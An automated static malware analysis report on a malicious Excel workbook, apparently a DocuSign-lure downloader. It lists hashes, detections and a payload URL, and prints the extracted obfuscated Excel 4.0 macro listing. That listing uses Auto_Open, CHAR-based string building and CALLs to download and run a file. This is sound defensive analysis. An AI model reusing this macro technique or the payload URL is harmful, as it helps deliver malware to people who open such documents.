Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 066e73417bf2a82d…

MALICIOUS

Office (OLE) / .XLSX

329.0 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel
MD5: c628c8dc6670e110a582b9ac59a74d1e SHA-1: 678a757fc9715256ef79810bda8b846fdb77b8dc SHA-256: 066e73417bf2a82dc5d883d6f9d405fe8c6896e1469cece2dec9bac0a1e02005
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros with an Auto_Open entry, which is a critical finding indicating automatic execution upon opening. The macros utilize dangerous functions like RUN and CONCATENATE, and reference the URL https://myscape.in/ds/161120.gif. This suggests the macro is designed to download and execute a secondary payload from the specified URL, aligning with the behavior of a downloader malware.

Heuristics 7

  • ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://myscape.in/ds/161120.gif� Referenced by macro
    • https://myscape.in/ds/161120.gifReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
c7e4e7ed3c1ce4a0357cad7ea2d4765567912ff9637c55ef23ac64833b3a62a6		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6274 bytes
Preview script
First 1,000 lines of the extracted script
' 0085     16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  DocuSig
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d    8 !A40 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'    8 ,A51,RUN(R59),""
'    8 ,R59,RUN(   8 !D50),""
'    8 ,B200,"https://"&C201&D202&E203,""
'    8 ,BN62,"CONCATENATE(BN63,BN64,BN65,BN66,BN67,BN68,BN69,BN70,BN71)",""
'    8 ,BN63,CHAR(BO63+BP63+BQ63),""
'    8 ,BN64,CHAR(BO64+BP64+BQ64),""
'    8 ,BN65,CHAR(BO65+BP65+BQ65),""
'    8 ,BN66,CHAR(BO66+BP66-BQ66),""
'    8 ,BN67,CHAR(BO67+BP67-BQ67),""
'    8 ,BN68,CHAR(BO68+BP68-BQ68),""
'    8 ,BN69,CHAR(BO69-BP69+BQ69),""
'    8 ,BN70,CHAR(BO70-BP70+BQ70),""
'    8 ,BN71,CHAR(BO71-BP71+BQ71),""
'    8 ,CV74,"CONCATENATE(CV77,CV78,CV79,CV80&"D"&CV82,CV83,CV84,CV85,CV86,CV87,CV88)",""
'    8 ,CV75,CHAR(CW75+CX75+CY75),""
'    8 ,CV76,CHAR(CW76+CX76+CY76),""
'    8 ,BN77,"CONCATENATE(BN78,BN79,BN80,BN81,BN82,BN83,BN84)",""
'    8 ,CV77,CHAR(101),""
'    8 ,BN78,CHAR(BO78-BP78-BQ78),""
'    8 ,CV78,CHAR(CW78+CX78+CY78),""
'    8 ,BN79,CHAR(BO79-BP79-BQ79),""
'    8 ,CV79,CHAR(CW79-CX79-CY79),""
'    8 ,BN80,CHAR(BO80-BP80-BQ80),""
'    8 ,CV80,CHAR(CW80-CX80-CY80),""
'    8 ,BN81,CHAR(BO81-BP81+BQ81),""
'    8 ,CV81,CHAR(CW81-CX81-CY81),""
'    8 ,BN82,CHAR(BO82-BP82+BQ82),""
'    8 ,BY82,CONCATENATE(BY85&BY86&BY87&BY88),""
'    8 ,CV82,CHAR(CW82-CX82-CY82),""
'    8 ,BN83,CHAR(BO83-BP83+BQ83),""
'    8 ,BY83,CHAR(BZ83+CA83+CB83),""
'    8 ,CV83,CHAR(CW83+CX83-CY83),""
'    8 ,BN84,CHAR(BO84-BP84+BQ84),""
'    8 ,BY84,CHAR(BZ84+CA84+CB84),""
'    8 ,CV84,CHAR(CW84+CX84-CY84),""
'    8 ,BY85,CA85,""
'    8 ,CV85,CHAR(99),""
'    8 ,BY86,CHAR(BZ86+CA86+CB86),""
'    8 ,CV86,CHAR(CW86+CX86-CY86),""
'    8 ,BY87,CHAR(BZ87+CA87+CB87),""
'    8 ,CV87,CHAR(CW87-CX87+CY87),""
'    8 ,BY88,CHAR(BZ88+CA88+CB88),""
'    8 ,CV88,CHAR(CW88-CX88+CY88),""
'    8 ,BY89,CHAR(BZ89+CA89+CB89),""
'    8 ,CV89,CHAR(CW89-CX89+CY89),""
'    8 ,BY90,CHAR(BZ90+CA90+CB90),""
'    8 ,CV90,CHAR(CW90-CX90+CY90),""
'    8 ,BN91,"CONCATENATE(BN92,BN93,BN94,BN95,BN96,BN97,BN98,BN99,BN100,BN101,BN102,BN103,BN104)",""
'    8 ,BN92,[],""
'    8 ,BN93,[],""
'    8 ,BN94,[],""
'    8 ,BS94,CONCATENATE(BS95&BS96&BS97&BS98),""
'    8 ,BN95,[],""
'    8 ,BS95,CHAR(BT95+BU95-BV95),""
'    8 ,BN96,[],""
'    8 ,BS96,CHAR(BT96+BU96-BV96),""
'    8 ,BN97,[],""
'    8 ,BS97,CHAR(BT97-BU97+BV97),""
'    8 ,BN98,[],""
'    8 ,BS98,CHAR(BT98-BU98+BV98),""
'    8 ,BN99,[],""
'    8 ,BN100,[],""
'    8 ,BN101,[],""
'    8 ,BN102,[],""
'    8 ,BN103,[],""
'    8 ,BN104,[],""
'    8 ,BS104,"CONCATENATE(BS106,BS107,BS108,BS109,BS110)",""
'    8 ,BS105,CHAR(BT105+BU105+BV105),""
'    8 ,BS106,CHAR(BT106+BU106+BV106),""
'    8 ,BS107,CHAR(BT107+BU107+BV107),""
'    8 ,BS108,CHAR(BT108-BU108-BV108),""
'    8 ,BS109,CHAR(BT109-BU109-BV109),""
'    8 ,BS110,CHAR(BT110-BU110-BV110),""
'    8 ,BR126,CONCATENATE(BR127&BR128&BR129&BR130&BR131&BR132&BR133),""
'    8 ,BR127,CHAR(BS127+BT127+BU127),""
'    8 ,BR128,CHAR(BS128+BT128+BU128),""
'    8 ,BR129,CHAR(BS129+BT129+BU129),""
'    8 ,BR130,CHAR(BS130+BT130+BU130),""
'    8 ,BR131,CHAR(BS131-BT131-BU131),""
'    8 ,BR132,CHAR(BS132-BT132-BU132),""
'    8 ,BR133,CHAR(BS133-BT133-BU133),""
'    8 ,DH16,"CONCATENATE("S"&DH18,DH19,DH20,DH21,DH22&X94)",""
'    8 ,DH17,CHAR(DI17+DJ17+DK17),""
'    8 ,DH18,CHAR(DI18+DJ18+DK18),""
'    8 ,DH19,CHAR(DI19+DJ19+DK19),""
'    8 ,DH20,CHAR(DI20-DJ20-DK20),""
'    8 ,DH21,CHAR(DI21-DJ21-DK21),""
'    8 ,DH22,CHAR(DI22-DJ22-DK22),""
'    8 ,DE31,CONCATENATE(DE34&DE35&DE36&DE37),""
'    8 ,DE32,CHAR(DF32+DG32+DH32),""
'    8 ,DE33,CHAR(DF33+DG33+DH33),""
'    8 ,DE34,CHAR(DF34+DG34+DH34),""
'    8 ,DE35,CHAR(DF35+DG35+DH35),""
'    8 ,DE36,CHAR(DF36-DG36-DH36),""
'    8 ,DE37,CHAR(DF37-DG37-DH37),""
'    8 ,DE38,CHAR(DF38-DG38+DH38),""
'    8 ,DE39,CHAR(DF39-DG39+DH39),""
'    8 ,E60,"CONCATENATE("R"&E63,E64,E65,E66&"n"&E68,E69,E70,E71,E72,E73&"F"&E75,E76,E77,E78)",""
'    8 ,E61,CHAR(F61+G61+H61),""
'    8 ,E62,CHAR(82),""
'    8 ,E63,CHAR(F63+G63+H63),""
'    8 ,E64,CHAR(F64-G64-H64),""
'    8 ,E65,CHAR(F65-G65-H65),""
'    8 ,E66,CHAR(F66-G66-H66),""
'    8 ,E67,CHAR(F67+G67-H67),""
'    8 ,E68,CHAR(F68+G68-H68),""
'    8 ,E69,CHAR(F69+G69-H69),""
'    8 ,E70,CHAR(F70-G70+H70),""
'    8 ,E71,CHAR(F71-G71+H71),""
'    8 ,E72,CHAR(F72-G72+H72),""
'    8 ,E73,CHAR(111),""
'    8 ,E74,CHAR(F74+G74+H74),""
'    8 ,E75,CHAR(F75+G75+H75),""
'    8 ,E76,CHAR(F76-G76-H76),""
'    8 ,E77,CHAR(F77-G77-H77),""
'    8 ,E78,CHAR(F78-G78-H78),""
'    8 ,X94,"CONCATENATE(X95,X96,X97,X98,X99,X100&"A")",""
'    8 ,X95,CHAR(Y95-Z95-BA95),""
'    8 ,X96,CHAR(Y96-Z96+BA96),""
'    8 ,X97,CHAR(Y97-Z97+BA97),""
'    8 ,X98,CHAR(Y98-Z98+BA98),""
'    8 ,X99,CHAR(Y99+Z99-BA99),""
'    8 ,X100,CHAR(Y100+Z100-BA100),""
'    8 ,X101,CHAR(Y101+Z101-BA101),""
'    8 ,D50,"CALL("Ke"&   8 !DE31&"32","Cr"& DocuSig!CV74&"yA","JCJ", DocuSig!BN62,0)",""
'    8 ,D51,RUN(D55),""
'    8 ,D55,"CALL("Ke"& DocuSig!BY82&"32","Cr"& DocuSig!CV74&"yA","JCJ", DocuSig!BN62& DocuSig!BN77,0)",""
'    8 ,D56,RUN(   8 !DP72),""
'    8 ,DP72,"CALL("U"& DocuSig!BS104,"U"&   8 !E60,"IICCII",0,   8 !B200, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,0,0)",""
'    8 ,DP73,CALL(DP82),""
'    8 ,DP82,"CALL( DocuSig!BR126,   8 !DH16,"IICCCCI",0, DocuSig!BS94, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,,0,0)",""
'    8 ,DP83,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.